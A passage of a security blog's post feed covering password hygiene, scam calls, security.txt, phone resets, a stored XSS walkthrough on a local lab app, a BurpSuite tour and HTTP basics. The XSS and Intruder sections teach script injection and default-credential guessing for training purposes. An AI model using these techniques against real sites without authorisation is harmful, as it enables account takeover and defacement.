(These are not allowed by most applications, but are still good to avoid.)\nAlso, avoid using passwords like mobile numbers, pet names, favorite movie characters, etc.\nUse a strong master password with a combination of lower case, upper case, numerics, and symbols, with a length of more than 12 characters.\nDon't Forget the Master Password # The master password is the single key that unlocks your Password Manager; if you forget it, you lose access to all your data!\nMake sure you find a way to remember it.\nBackup & Store Securely (For Self-Hosted users) # You must back up and store your encrypted Password Manager file securely.\nEncrypted copies of self-hosted Password Manager files can even be stored in the cloud, so that if someone else gains access, they won't be able to read them.\nAlso, use Two-Factor Authentication for any online services/accounts where 2FA is available to protect yourself even more and reduce the chances of your accounts being hacked.\nSummary # Password breaches happen more frequently than ever, so it's essential to be proactive about security when saving your online accounts' login credentials. Password managers make this process easier by storing all your account details in an encrypted vault for easy access at any time. If you haven't tried using a Password Manager yet, what are you waiting for? It'll help keep your data safe and sound!\n","date":"13 January 2022","externalUrl":null,"permalink":"/secure-your-passwords-easily/","section":"Posts","summary":"","title":"Secure your passwords easily","type":"posts"},{"content":"In this post, we will cover little bits of information that can help you identify whether it's a valid phone call or a fraudster trying to lure you into a trap.\nIn today's world, we are digitally connected, and our mobile device helps us get things done by providing multiple options 
(through calls, messages, emails, etc.).\nAt the same time, with or without our knowledge, we might be sharing some of our information with other parties, and how those parties use it is beyond our knowledge.\nA minimal awareness can help you protect yourself from many spam callers.\nIdentifying fraud/spam calls # Below are some tips for identifying spam or fraud calls.\nThey try to start the conversation with what they know, like your phone number, and try to extract more information from you by asking for details.\nThe conversation starts with incorrect information. If you point out that it is wrong, the spammers will ask for your details to update their database.\nIf you try to ask for more information, the fraudsters keep providing generic information that may be of little or no use.\nThe spammer calls you and asks you to prove your identity before they can disclose some exciting offers or information.\nExample: Call claiming to be from a government entity # One of the techniques is to claim they are calling from a government body and say that you are in trouble for doing something wrong.\nScammers act as if they are doing you a favor and keep pressuring you to transfer XXX$ immediately so they can rectify it without you being penalized by a government body or going to prison.\nIn return, they will ask you to provide more details and prove your identity.\nHang up the call and verify with the service provider whether it's valid. Make some online inquiries about the information provided.\nResponding to Fraud/Spam calls # Do-Not-Disturb Service # Some operators offer a Do Not Disturb service, which will prevent spam & fraud calls to some extent. Enable it if available.\nUsing a Third-Party Service # One tip is to use an app or online service to identify the caller. 
These services keep an updated list of spam/fraud callers based on user feedback and their proprietary techniques. Examples include Whoscall, Showcaller, Truecaller, etc. Choose any service that meets your requirements.\nA point to keep in mind: data is the new business model, and we depend on online services for the majority of our activities.\nDrop the call # When you realize it is a spam/fraud call, disconnect it. Though you can chit-chat for some entertainment or fun, they try to collect pieces of information to build your profile in their database. Also, later you may get more spam calls than expected.\nSlow them down, check for legitimate business information, and take time to consider the purchase. The spammer will keep on adding pressure to commit right away.\nDo Not Provide any Sensitive Information. # Refuse to provide any information like your home address, bank account information, usernames, passwords, OTPs, info on government-issued identity cards, etc.\nYou can always call back the genuine customer care service/organization to verify that the information you received is accurate. Also, you can visit their nearest branch to confirm, if one is nearby.\nDo not follow any Instructions. # Sometimes, to steal funds from your account, they may have already gathered all the details through various social engineering techniques or from the internet, and all they want is an OTP or a confirmation code.\nAvoid typing any PINs or passwords when they insist on it. Do not pay any shipping or duty taxes for unknown gifts.\nAre you already a victim? # Please report it # Immediately report it to the respective organization and the cybercrime department for your locality/country. For financial accounts, request that banks freeze all your bank accounts, credit cards, etc., until it is sorted out. Reset Passwords and enable Multi-Factor Authentication (if available). Ensure passwords are reset for all the impacted accounts. 
Reset Devices (if necessary) If you suspect any of your devices might have been compromised, for example after clicking an unwanted link, it would be safe to back up all important data and reset all devices. ","date":"6 January 2022","externalUrl":null,"permalink":"/valid-phone-call-or-a-fraud-call/","section":"Posts","summary":"","title":"Valid phone call or a fraud call?","type":"posts"},{"content":"Do you own or maintain any websites? If yes, this might be helpful for you.\nSecurity is a significant concern for any website these days. To help provide security to their users, many websites have adopted the proposed security.txt standard, which allows researchers and hackers alike to find vulnerabilities and report them without fear of legal reprisal. This article will discuss what security.txt files are, how they work, why you, as the business or owner of the website, should care about adopting them, and more!\nWhat is a security.txt file? # It is a proposed website standard that allows owners and security researchers to work more closely together to report any identified security issues.\nThis \u0026ldquo;security.txt\u0026rdquo; file is a new open standard, still in the draft stage, used by website administrators, bug bounty hunters, and other security researchers who want to share information about discovered vulnerabilities with website owners in an organized manner.\nHow does security.txt work? # If you are the site owner, you list contact information for reporting vulnerabilities (such as an email address and PGP key) in your security.txt file, and researchers can use this information to report any issues they find privately. 
By doing this, you make it easier for researchers to report vulnerabilities.\n\u0026ldquo;security.txt\u0026rdquo; is generally placed on your website at \u0026ldquo;https://www.example.com/.well-known/security.txt\u0026rdquo;. Here are the example contents of a security.txt file.\nFigure 1: Sample security.txt file\nWhy should you care about security.txt? # A common phrase in the security industry is, \u0026ldquo;Security is only as strong as the weakest link.\u0026rdquo; A single security bug is more than enough to compromise the complete chain.\nThe website owner might take all the necessary steps to protect their online asset from malicious actors.\nSecurity vulnerabilities are like a \u0026ldquo;Cat and Mouse\u0026rdquo; story: developers continuously work in a fast-paced agile environment to deliver value to customers in a shorter time, and some security issues might go unnoticed.\nHowever, if an attacker can find and exploit a vulnerability on the website that was not patched or adequately addressed, it can potentially do much damage.\nAs a site owner, you should care about adopting security.txt files because they can help make it easier for researchers to report vulnerabilities to you privately and securely. 
This can help protect the researcher and your website from legal repercussions if the vulnerability is not reported responsibly.\nAdditional Benefits: # Information about the organization\u0026rsquo;s secure disclosure policy can be stated so that researchers can read it and comply with it to the best extent possible.\nThe security.txt file helps researchers communicate directly with the respective security team, who are already familiar with the reported topic.\nSecurity researchers can also understand what part of the website is in scope for testing and what is not part of the scope.\nAcknowledgments for security researchers who have previously reported issues.\nLinks to job references if the organization seeks a security analyst or red team expert.\nIt is easy! You can create a security.txt file using this handy tool: https://securitytxt.org/#generate\nReferences # https://en.wikipedia.org/wiki/Security.txt https://securitytxt.org/ - Template Generation https://github.com/securitytxt/security-txt ","date":"6 January 2022","externalUrl":null,"permalink":"/the-importance-of-a-security.txt-file/","section":"Posts","summary":"","title":"The Importance of a Security.txt File","type":"posts"},{"content":"Are you thinking of selling your smartphone, or would you like to give your phone to family members or friends?\nIf yes, then let\u0026rsquo;s get started. A few checks need to be done before you give it away.\nToday\u0026rsquo;s smartphones contain more than call records and messages.\nI use my mobile phone for communication purposes, to perform payment transactions, to capture beautiful moments, to keep updated on exciting topics, for entertainment, to organize myself, to shop, etc.\nAs information accumulates on our mobile devices over months/years, it is worth reviewing it before giving the device away.\nBackup Data # As of today, most users prefer to store information in their respective cloud user accounts. 
Still, it would be better to re-verify and ensure all the data synchronization is up-to-date.\nNavigate to Settings \u0026ndash;\u0026gt; Accounts \u0026ndash;\u0026gt; Select your primary sync Gmail account \u0026ndash;\u0026gt; Check Sync on for all items enabled.\nFollowed by verifying when was the last sync performed. Click on account preferences as shown below and select Account Sync status.\nThe rest of the users who would like to keep the data locally can connect the phone to a Laptop/Desktop and copy all the data to a local drive.\nPlug the USB charging cable into your device and select File Transfer/Android Auto by clicking on the USB Preferences in the notification bar.\nAfter connecting the device, the system will auto-detect and mount the shared folder to your operating system. Once opening the folder, all the files will be displayed, as shown below.\nEnsure all the critical data is copied onto the local storage.\nA general rule in information security is to keep at least two backups so that even if one backup fails in an unexpected scenario, the second backup copy helps restore your data.\nUnlink your Google Account # Once all the data of calls, messages, documents, etc., are backed up, the next step is to log into your Google account and remove all the links associated with the mobile device.\nThis can be done from a mobile or from the web browser too. Go to Gmail \u0026ndash;\u0026gt; Accounts \u0026ndash;\u0026gt; Security \u0026ndash;\u0026gt; Your Devices.\nSelect the phone you want to remove, click on Sign Out, and remove your Google account from the phone.\nThis is an important step, if it is missed the new owner of the phone might have trouble in logging into the device as the previously used gmail account is needed to unlock it. Reset and erase all data. # Now it\u0026rsquo;s time to reset and erase all the data. We can wipe out all settings, data stored on the device, etc.\nRe-think and ensure you are not losing any important data. 
Navigate to Settings \u0026ndash;\u0026gt; System \u0026ndash;\u0026gt; Reset Options \u0026ndash;\u0026gt; Erase all data (factory reset)\nNow the phone wipes out all the data on the device and will boot up.\nIf your usage patterns, like your PIN code or unlock pattern, can be easily recognized on the screen, we would recommend cleaning it so nobody can guess your password. (This is generally for those who use the same passwords for multiple devices/accounts.) Even after a factory reset, if you are paranoid about your data on the device, you can encrypt it again and reset the device as shown above.\nRemove SIM \u0026amp; Memory Cards # Once you are confident that all the above steps are done, the last step would be to remove your SIM card and memory cards, if any.\nIf you use a carrier-connected device, work with your vendor to deactivate the service and ensure all pending bills are paid.\nI hope you find the above article helpful!\n","date":"2 October 2021","externalUrl":null,"permalink":"/things-to-do-before-giving-away-your-smartphone-android/","section":"Posts","summary":"","title":"Things to do before giving away your smartphone (Android)","type":"posts"},{"content":"Welcome back to learning about the Cross-Site Scripting (XSS) vulnerability with the Kurukshetra app built by d4rk36.\nThis post will start with what an XSS vulnerability is and then try to analyze the XSS challenges on the vulnerable app.\nEnsure your lab is up and running; set it up first if you have not done so yet.\nWhat is Cross-Site Scripting? 
# Cross-site scripting is also referred to as \u0026ldquo;XSS.\u0026rdquo;\nCross-site scripting is an application flaw in which the server takes malformed input from the client (i.e., a browser or proxy) and, without verifying it, appends it and sends it back as it is in an HTTP response without proper validation.\nIf you are not familiar with what HTTP is, check out the following HTTP Basics Tutorial to help you get started.\nThe malformed input lets an attacker inject malicious code (like HTML or JavaScript) into the server\u0026rsquo;s HTTP response and can change the application\u0026rsquo;s behavior.\nAn XSS vulnerability can be used to deface the landing pages of websites (which is called defacement), steal user sessions and gain access to user accounts, secretly log and monitor the victim\u0026rsquo;s keystrokes, control the victim\u0026rsquo;s web browser, retrieve user-saved passwords from the browser, or even redirect victims to a malicious page, and much more.\nAdditionally, XSS combined with other security vulnerabilities makes the attack more severe.\nIn total, there are three types of XSS vulnerabilities, as detailed below.\nFigure 1: Types of Cross-Site Scripting Vulnerabilities\nStored XSS - Walkthrough # After setting up the lab, visit http://localhost:8066. The vulnerable Kurukshetra application should be loaded as shown below.\nFigure 2: XSS Vulnerable Kurukshetra App - Challenge 1\nTake some time to understand how the application functionality works before we start assessing.\nTry adding a simple \u0026ldquo;HelloWorld\u0026rdquo; string, and check how the input is appended to the comments below.\nFigure 3: Understanding how the application behaves with user input\nFrom the above behavior, we can understand that the given input is stored and displayed back.\n💡 This is one of the signs where you can check if it can accept any malformed input as well. 
Let\u0026rsquo;s go ahead and try out the classic XSS payload.\nFigure 4: Classic XSS Snippet\nThe *\u0026lt;script\u0026gt;* tag in HTML is used to extend the page\u0026rsquo;s capabilities and include interactivity, so it will be used to test whether it is possible to inject code snippets.\nThe alert() function in JavaScript is used to display a popup window.\nI will insert the script code to make things visually appealing, as displayed in the image below. When we see the popup window, it means our script code got injected and executed successfully.\nFigure 5: Inserting XSS Payload\nInject the script code in the input field and click the \u0026ldquo;Submit\u0026rdquo; button.\nImmediately, a popup message will be displayed, as shown below, to confirm our script execution.\nFigure 6: XSS alert pop-up\nClick the \u0026ldquo;OK\u0026rdquo; button, and the application loads the page as usual.\nTo further understand our script injection, right-click, select \u0026ldquo;View Page Source,\u0026rdquo; and then search for the above-injected script code.\nFigure 7: XSS Script Code in HTML Response\nThe script code was injected exactly as it was given. This confirms we could inject the malformed script code in the user input field.\nRevisit the following page: http://localhost:8066/ch01.php. Observe that the popup message is displayed again.\nThis is what a stored cross-site scripting vulnerability is. Once the malformed input is injected, it will be executed every time the page is loaded. If multiple users are using the same application, then the script code will also be executed for each individual victim.\nAttackers can use the above type of functionality to deface the page and completely change it based on malicious intent using JavaScript and HTML code. Similarly, they can write a malicious piece of code to steal authenticated users\u0026rsquo; session tokens and reuse them to access the users\u0026rsquo; accounts without passwords. 
Or even redirect victims to a malicious page, etc.\n🎉 This type of behavior is called a Stored Cross-Site Scripting vulnerability. Yay! We found a stored cross-site scripting vulnerability and solved XSS Challenge 1.\nAbout XSS Payloads # The above example demonstrates a simple XSS code snippet.\nYou might be wondering how you would ever be able to create those script payloads when you are not even familiar with JavaScript and that stuff.\nWell, lots of security researchers have already done most of the work related to payloads for you. All you need to know is when to use them and what needs to be changed based on your scenario. As your experience grows, you will be able to write your own custom payloads.\nHere is the \u0026ldquo;PayloadsAllTheThings\u0026rdquo; repository, which you might want to bookmark.\nYou will find a lot of information on different vulnerabilities and their payloads. Just search for \u0026ldquo;XSS Injection\u0026rdquo;.\nGo ahead and try out a wide range of XSS payloads and see how the application behaves.\n💡 Practice makes perfect.\nClean up - XSS Data # It might become annoying if we keep getting too many popups, which can even impact usability.\nClick on the \u0026ldquo;Purge Database\u0026rdquo; button to eliminate the annoying popups and start fresh.\nFigure 8: Clean up all annoying warnings with - Purge Database\nConclusion # I hope you learned about the different types of cross-site scripting vulnerabilities. Organizations are using the most secure coding frameworks and best practices, but they might still miss out due to complex application ecosystems, which can give way to XSS vulnerabilities. 
The above example demonstrates how improper coding practices lead to exploitable stored XSS vulnerabilities, and fixing them as soon as possible as part of security assessments can reduce the huge impact on production systems.\n","date":"13 December 2022","externalUrl":null,"permalink":"/challenge-1-stored-cross-site-scripting-attack/","section":"Posts","summary":"","title":"Challenge 1 - Stored cross-site scripting attack","type":"posts"},{"content":"In this post, we will walk through BurpSuite and start learning the concepts that we will be using, and I will cover more about the features when needed during our assessments.\nIf you haven\u0026rsquo;t installed Burp Suite, refer to BurpSuite Installation and ensure the tool is successfully installed.\nOverview # Let\u0026rsquo;s launch the BurpSuite community edition using the steps from the BurpSuite Installation guide.\nAt launch, the \u0026ldquo;Learn\u0026rdquo; tab will be selected, and all the information required for learning and using the tool will be displayed as shown below. You can always explore the text and video tutorials provided by the tool.\nFigure 1: BurpSuite Community - Learn Tab\nDashboard # A place where you can see information about the crawling and issues identified.\nFigure 2: BurpSuite Dashboard\nThe Tasks section is a place where we can configure crawling for all websites we visit and keep an eye on their status. By default, the tool helps us by enabling \u0026ldquo;Live passive crawl\u0026rdquo;.\nPassive crawl means that when I visit any website using the Proxy tool, it starts looking at all the HTML content, collects page URLs, parameters, etc., and 
keeps building the sitemaps locally for our knowledge base.\nThis is similar to the daemon service, it will keep on continuously running from the start of the BurpSuite tool, you can disable it by setting the \u0026ldquo;Capturing\u0026rdquo; off.\nEvent Log section gives you information about the BurpSuite tool itself like services started, error information if it is unable to load any extender plugin, network issues, and warning about the tool which might impact your work.\nIssues Activity is a place where the BurpSuite scanner will display all the vulnerabilities identified by the tool\nIssues Information section where you can see a detailed description of the security bug reported and the proof of concept of how the tool was able to identify it as a security defect.\nThe above issues sections are only available in the BurpSuite Professional edition.\nTarget # The target tab consists of three items, site map, scope, and issue definitions.\nSite map is the place where you can see all the URLs, and parameters information collected by the crawler. As we can only see the status in the dashboard, here you can find the detailed information post crawling of websites.\nFigure 3: BurpSuite Target Scope is the most important section while performing any security assessments or pentesting.\nBe very clear about which particular websites are part of your scope for security testing, and add them to the \u0026ldquo;In Scope\u0026rdquo; section. (Example: securityarray.io as in scope)\nAnything which is not supposed to be tested on a particular website excludes all of them from testing by adding it to the \u0026ldquo;Out of Scope\u0026rdquo; section. (Example: payments.securityarray.io)\nAlways keep in mind, that only perform security testing on the scope mentioned to you. 
Violating the terms and conditions of the scope of your assessments will lead to banning you, or sometimes you might face legal challenges from the owners of the website.\nIssue definitions are like a vulnerabilities inventory of BurpSuite about all the vulnerabilities it can identify. The security defects are all categorized from informational to High severity.\nThis is also a good place to keep referring to vulnerabilities information.\nProxy # This is the core feature of the BurpSuite tool.\nIn short, once you configure the BurpSuite proxy with your web browser, Any traffic which goes from your web browser to the web server will be viewable in your BurpSuite proxy tab.\nNot only view, but you can also intercept and modify any request before it goes to the server.\nGenerally, the browser limits our capabilities to only view the HTTP messages for debugging purposes, by using this proxy tool as an intermediate you can overcome those limitations\nFigure 4: BurpSuite Proxy In security, we often keep on saying \u0026ldquo;Validate every piece of data which is coming from the client side\u0026rdquo;. As it can be tampered with.\nFigure 5: BurpSuite Proxy Enabled After launching the BurpSuite tool, the first thing to ensure your proxy listener is started and in a running state.\nNavigate to the \u0026ldquo;Proxy\u0026rdquo; tab ⇾ \u0026ldquo;Options\u0026rdquo; ⇾ \u0026ldquo;Proxy Listeners\u0026rdquo;. As shown in the above screenshot.\nHTTP History is a location where all the ongoing HTTP traffic information can be viewed.\nIntercept tab is where you have the option to enable for all or each request you want to change before sending to the web server, or turn it off if you don\u0026rsquo;t want to modify any requests.\nBy default, the intercept feature is enabled at startup.\nNavigate to the \u0026ldquo;Proxy\u0026rdquo; tab ⇾ \u0026ldquo;Options\u0026rdquo; ⇾ \u0026ldquo;Intercept Client Requests\u0026rdquo;. 
As shown in the above screenshot.\nYou would be able to see the Intercept requests enabled, and the rule set of what all requests the Burp Proxy will intercept.\nSimilarly, we can enable the intercepting of responses as well if you want to see it in the proxy itself.\nAdditionally, the Intercept tool also does contain an inbuilt Chromium browser which is preconfigured.\nFigure 6: BurpSuite Intercept Browser Launch the browser and start accessing any website, you should be able to see all the data being seeded into your BurpSuite Proxy.\nIn short, the takeaway from the proxy tool is to configure with any web browser, and we can start playing with the requests sent from the client to the server.\nIntruder # This is one of the best features of the BurpSuite. Let\u0026rsquo;s say you are having a situation where you need to test whether the application is using the default username and passwords for the server.\nYes, we do consider it a security bug if you use the default username and passwords on the server. Because anyone on the internet can guess it.\nIf our list of default usernames/passwords is less than 10, probably you can do it manually. But what if it\u0026rsquo;s 100+ and beyond?\nBurpSuite intruder is a big savior here. All, we need is to load the HTTP request, choose where you need to inject the modified values, set the payloads list (usernames or passwords list), and fire. 
That\u0026rsquo;s it!\nIntruder itself is a very big concept, which we will be covering in upcoming articles.\nFor now, all you need to remember is we can fine-tune custom payloads and reduce our manual efforts at the time of security testing for various scenarios using intruder.\nRepeater # Based on the tab name, you could have probably guessed it is used to send repeated instructions!\nFor example, you are testing a Password Strength functionality where you need to check if accepts only small characters, or only numerics or passwords with lengths less than 5, etc.\nHere, we can do this from a web browser by accessing the application interface. But, don\u0026rsquo;t you think it\u0026rsquo;s too repetitive to always reload the page and enter a value, click submit and observe results?\nYes, the repeater saves us a lot of time. Just capture any request message and modify it before sending it to the server. You can see the response in the repeater tab itself. This saves us a lot of time when sending repeated requests.\nSequencer # As the name suggests, it is used to analyze a large sample of tokens to see whether it is predictable or completely randomized and unpredictable.\nFigure 7: BurpSuite Sequencer In general, this is used for analyzing the session tokens to find if it is predictable. If you can predict what the next session token will be set by the server, then this is considered a security flaw.\nLive capture helps you to capture each request directly by interacting with the web server. Whereas Manual load is a place where you can give samples of the tokens you have collected for analyzing the strength of the tokens.\nDecoder # You encountered a type of encoded hash and are not sure what type of hash it is and how to decode it during assessments. 
We even have a way to decode/encode it using the decoder tool.\nFigure 8: BurpSuite Decoder Start by using the \u0026ldquo;Smart decode\u0026rdquo; option, which will figure out the type of encoding and decodes it to plain text.\nBurpSuite decoder currently supports URL, HTML, base64, ASCII hex, hex, binary, octal, and GZIP encodings as of today.\nComparer # Comparer lets you view the differences between the two messages of what was modified and what was added newly.\nFigure 9: BurpSuite Comparer Logger # Logger displays all the communication information between your BurpSuite tool set and the target website.\nFigure 10: BurpSuite Logger Extender # BurpSuite extender gives additional superpowers to expand the capabilities of the current toolset.\nFigure 11: BurpSuite Extender BAppStore is a list of plugins inventory that is provided by portswigger as well as from the security community.\nAPIs provide us the capability to add custom functionalities based on requirements.\nExtensions tab provides you with information about all the extensions which are enabled and their output.\nProject options # Let\u0026rsquo;s say I want to automate the set of sequential operations which need to be performed with less manual effort. 
Can I do it?\nYes, you can do that using Macros.\nFigure 12: BurpSuite Project Options Project options provide you with a lot more benefits to tweak session handling rules, how and where the cookies are maintained, Macros to repeat a sequence of actions based on rules, HTTP communication preferences, etc.\nTo save all the changes, navigate to the \u0026ldquo;Project\u0026rdquo; menu item ⇾ select \u0026ldquo;Project options\u0026rdquo; ⇾ \u0026ldquo;save project options\u0026rdquo;.\nSimilar way, you can load the saved options using \u0026ldquo;Load project options\u0026rdquo;.\nUser options # These are settings specifically for the user who uses the BurpSuite.\nFigure 13: BurpSuite User Options Some options where we are tweaking repeatedly while launching BurpSuite, probably there is a way to save that setting and use it whenever you launch the tool rather than configuring it every time.\nSay, you want to change the Interface to how it looks better for you or update shortcut keys, change temporary file location, update communications information, etc.\nAll about how you want the tool to behave can be updated here.\nLastly, to save all the changes, navigate to the \u0026ldquo;Burp\u0026rdquo; menu ⇾ select \u0026ldquo;User Options\u0026rdquo; ⇾ \u0026ldquo;save user options\u0026rdquo;. Using the same way, you can load the saved options using \u0026ldquo;Load user options\u0026rdquo;.\nSummary # Well, we have covered a good amount of information about the different sections available in the BurpSuite tool.\nI hope, by now, you are familiar to navigate and choose different tabs based on requirements.\n","date":"29 July 2022","externalUrl":null,"permalink":"/burpsuite-overview/","section":"Posts","summary":"","title":"BurpSuite Overview","type":"posts"},{"content":"Discover the internals of HTTP with the following beginner\u0026rsquo;s tutorial. 
If you are new to information security or getting started in web application security, this post will walk you through the HTTP basics and foundations needed.\nIntroduction to HTTP and its importance # HTTP, which stands for \u0026ldquo;Hypertext Transfer Protocol\u0026rdquo;, is the foundation used for data communications on the World Wide Web. In simple words, this protocol enables communication between our web browser and web servers.\nUnderstanding HTTP is crucial for anyone who is interested in getting into security testing. It is a basic foundation for all data communication on the internet. Knowing about HTTP requests, responses, and status codes will help us understand more about a web application and its behaviour during the security testing process and even help us automate repetitive manual work.\nWhat is HTTP? # HTTP is a protocol with a set of defined rules for communicating between the client and the server. Think of it like this: we humans use a common language to speak and communicate with each other. Similarly, the protocol is used to communicate between the client (Example: Web Browser) and the server (Example: Apache HTTP).\nOur modern web browsers hide this complexity by taking care of it and loading beautiful web pages for us that are easy to read and understand.\n💡 On the web, all I see is HTTPS. Yes, you are right. The working principle is the same, with a few changes. We will cover those as well.\nHTTP is a text-based protocol # HTTP is a simple message-based request/response protocol. When the user requests a web page, the browser sends an HTTP request to the server in the background, and the website responds back with the requested resource, which is called the response.\nHTTP acts as a medium through which information is exchanged. 
It allows the transfer of various types of data, including text, images, multimedia files, etc.\nStructure of HTTP Requests and Responses # A sample HTTP request-response exchange can be seen below:\nRequest:\nFigure 1: Sample HTTP Request by Client\nResponse:\nFigure 2: Sample HTTP Response from Server\nI can see this is a lot of data to digest; don\u0026rsquo;t worry about the overwhelming information you see in the response screenshot. You don\u0026rsquo;t need to remember everything. This is to get you acclimated to the type of data you\u0026rsquo;ll see from now on, and we will focus only on what we need the most.\nWe will come back to the technical details in a bit. Let\u0026rsquo;s go ahead and learn more about HTTP.\nHTTP is a Stateless Protocol # As the name suggests, a stateless protocol does not maintain the state of a transaction. Stateless protocols are typically used in low-level communication applications, where data packets can be sent without any notifications. An example of a stateless protocol is TCP.\nThis means you get the response back once a request is sent, and the connection closes. It will not be able to link or relate to any previous requests.\nExample of HTTP/1.0 and below versions # $ nc demo.testfire.net 80\nGET / HTTP/1.0\nHost: www.demo.testfire.net\n\nHTTP/1.1 200 OK\nServer: Apache-Coyote/1.1\nSet-Cookie: JSESSIONID=DF622CC21A2727AC5DD745D1A5B007BF; Path=/; HttpOnly\nContent-Type: text/html;charset=ISO-8859-1\nDate: Wed, 27 Jul 2022 07:48:18 GMT\nConnection: close\nI am using a tool called netcat (nc) here to demonstrate a stateless example by sending a custom request and waiting for the response from the server. 
If you observe closely, the server sends the last line Connection: close.\nThe Connection: header above tells us that the TCP connection can be closed once the HTTP response has been sent.\nBut from HTTP/1.1 and above, the TCP connection will not be closed and will wait for the next request to be received and processed.\n$ nc demo.testfire.net 80\nGET / HTTP/1.1\nHost: demo.testfire.net\n\nHTTP/1.1 200 OK\nServer: Apache-Coyote/1.1\nSet-Cookie: JSESSIONID=D7190756165E5E1B4986094B7A17630F; Path=/; HttpOnly\nContent-Type: text/html;charset=ISO-8859-1\nTransfer-Encoding: chunked\nDate: Wed, 27 Jul 2022 07:54:31 GMT\nIn the above request/response, you can see Transfer-Encoding: chunked, which means the connection is not closed, and it is waiting for the next request to process.\nThe Transfer-Encoding: header is used to specify the type of encoding used on the data sent in the message body, here a series of chunks.\nFor now, remember that the above concepts will be helpful while discussing advanced HTTP attacks.\nFigure 3: HTTP vs HTTPS\nHTTP vs HTTPS # The underlying working concepts of HTTP (Hypertext Transfer Protocol) and HTTPS (Hypertext Transfer Protocol Secure) are similar. HTTPS is a secure version of HTTP that uses SSL or TLS security certificates.\nThe HTTP protocol is outdated and not secure. The HTTPS protocol is more modern and uses encryption to protect user information.\nA few of the drawbacks of HTTP are detailed below:\nHTTP transmits messages in clear text, meaning that anyone on the network can view all of your requests, responses, and sensitive information like usernames, passwords, and card information. Not only that: if your data goes through any proxy connection, a copy of your request and response is also stored on the proxy server. How the admin uses that information is beyond our control, and it would be hard to track the attacker. In some browsers where the cache is enabled, a copy of your request will also be in the cache. 
This is especially risky when a session token or other sensitive information is passed in the URL. This is where HTTPS protects us, providing confidentiality and integrity against snooping and Man in the Middle (MITM) attacks.\nLastly, the default port for HTTP is 80, and for HTTPS it is 443. Either can be changed based on requirements.\nBreakdown of the HTTP components # Let’s dig a bit deeper and learn more about the HTTP syntax, methods, and headers. This section helps us review request and response messages and confirm whether a vulnerability exists or not.\nTake some time to understand it and get well acquainted.\nHTTP Syntax # We have seen that HTTP is a simple message-based protocol consisting of request and response messages.\nLet’s try to understand more about the request.\nA Typical Request Message: # Figure 4: HTTP Request Sections\nAn HTTP request contains two sections, the headers and the body. The headers and the body are separated by an empty line.\nThe body section varies based on the HTTP method. For example, a GET request doesn’t carry a body, but a POST request does.\n1. Headers:\nPOST /members/api/send-magic-link/ HTTP/2\nIn the above line, the first token, POST, is called the verb. It’s one of the HTTP methods, commonly used for posting data to the server.\nIt is followed by the URL path /members/api/send-magic-link/, the resource the client is trying to access or post to.\nLastly, HTTP/2 is the protocol and the version used for communication.\nEach header is placed on a separate line. The next header is Host.\nHost: securityarray.io\nThe Host header contains the domain name of the server to which the request must be sent.\nIt is followed by the other headers.\n2. Body:\nThe HTTP body section contains the additional supporting data for the POST request specified in the headers above. 
Below is an example of JavaScript Object Notation (JSON) data passed to the server in the message body.\n{\"name\":\"Raghu\",\"email\":\"example@securityarray.io\",\"requestSrc\":\"portal\"}\nThe message body can also be plain text, HTML, or XML, depending on the type of content being transmitted.\nA Typical Response Message\nFigure 5: HTTP Response\nAn HTTP response message looks similar to the above, containing the headers and the body separated by an empty line.\nHTTP/2 201 Created\nThe first line is the server’s acknowledgement back to the client. It starts with the protocol, HTTP/2, followed by 201, a status code describing the action the web server took for the request it received.\nHere, the server has created the content, and therefore we received 201 Created.\nFrom this, I can confirm that the content I posted was created on the server and that the server acknowledged it. The status line is followed by the other HTTP headers and then the message body, if any.\nThe HTTP message body is then rendered by the web browser and displayed to the user in a human-readable way.\nFigure 6: HTTP Methods\nHTTP Methods and Their Purpose # The method indicates the purpose for which the client has initiated the request and what the client expects in order to consider the result successful.\nLet’s walk through the different HTTP methods available.\nGET is used to retrieve a resource from the web server, and it doesn’t carry a message body. The URLs that you see in the browser’s address bar are all GET requests.\nHEAD is very similar to GET, but the server sends back only the header section.\nPOST performs a specific operation, such as creating or updating, with the provided message body. It is recommended to use POST for sending sensitive information like usernames, passwords, card details, etc., as the message body cannot be seen by intermediate resources like proxies. 
PUT is most commonly used for updating data and also for uploading content to the server.\nDELETE is used to remove a resource on the server, which is allowed only for users with authorized privileges.\nCONNECT is used to establish a tunnel to the server.\nOPTIONS is used to request the list of HTTP methods enabled on the server.\nTRACE is used for diagnostic purposes. Whenever you send a request using TRACE, you should see the same contents in the response as were sent in the request.\nFigure 7: HTTP Headers\nUnderstanding HTTP Headers # In HTTP, there are many headers, each intended for a specific purpose. We will cover some of them; if you would like to learn about the complete list of headers, the best source is the RFCs (HTTP/1.1, HTTP/2).\nSome headers that you can observe in both requests and responses are given below.\nContent-Length specifies the length of the message body in bytes.\nContent-Type specifies the type of content present in the message body.\nRequest headers # User-Agent identifies the browser or other client from which you are accessing the web server.\nOrigin specifies where the request originated from.\nReferer specifies the URL of the page from which the current request originated.\nAuthorization carries the token or credentials passed to the server for accessing privileged resources.\nAccept informs the server about the content types accepted by the client.\nAccept-Encoding informs the server about the encoding types understood by the client.\nResponse Headers # Set-Cookie is used to set cookies on the client side, such as the session cookie that identifies the session and user account used for accessing server resources.\nAccess-Control-Allow-Origin indicates whether the resource can be retrieved via cross-domain Ajax requests.\nCache-Control passes instructions to the browser about how the response must be cached.\nFigure 8: Status Codes\nDecoding HTTP Status Codes # The status codes are used to inform the client about how 
the request was handled. The server acknowledges with a three-digit numerical code describing how the request was processed.\nGetting familiar with status codes helps you review responses and take action while performing security assessments.\nFigure 9: HTTP Status Codes\nLet’s look at the common status codes that we will encounter day-to-day.\n100 Continue is sent by the server to tell the client to continue and send the message body. Once the body is complete, the server will respond with another status message.\n200 OK means that the request was successful and that the response body contains the result of the request.\n201 Created is returned in response to a PUT/POST request to indicate that the request was successful and the resource was created.\n301 Moved Permanently redirects the browser permanently to a different URL, so the client should use the new URL from now on.\n302 Found redirects the browser temporarily to a different URL.\n304 Not Modified tells the browser to use its cached copy, as the client already has the latest version of the resource.\n400 Bad Request is a client error indicating that the client submitted an invalid HTTP request.\n401 Unauthorized indicates that you need to be authenticated to access the server resource.\n403 Forbidden indicates that you do not have the privileges to access the resource on the server.\n404 Not Found means the requested resource is not present on the server.\n405 Method Not Allowed means the HTTP method specified in the request is not supported for the given URL.\n500 Internal Server Error indicates that the server was unable to process your request, which might be because of an unhandled error within the server application.\n503 Service Unavailable is returned when the server is under heavy load and is not able to function. 
